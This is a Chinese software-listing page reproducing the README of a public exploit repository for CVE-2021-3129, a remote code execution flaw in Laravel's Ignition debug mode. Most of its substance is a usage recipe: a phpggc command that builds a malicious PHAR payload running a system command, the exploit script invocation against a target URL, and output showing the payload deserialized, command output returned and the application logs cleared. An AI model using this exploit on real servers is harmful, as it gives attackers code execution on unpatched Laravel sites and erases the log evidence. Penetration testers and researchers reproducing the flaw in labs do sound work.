在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
开源软件名称(OpenSource Name):ambionics/laravel-exploits开源软件地址(OpenSource Url):https://github.com/ambionics/laravel-exploits开源编程语言(OpenSource Language):Python 100.0%开源软件介绍(OpenSource Introduction):laravel-exploitsExploit for CVE-2021-3129 Details: https://www.ambionics.io/blog/laravel-debug-rce Usage$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
请发表评论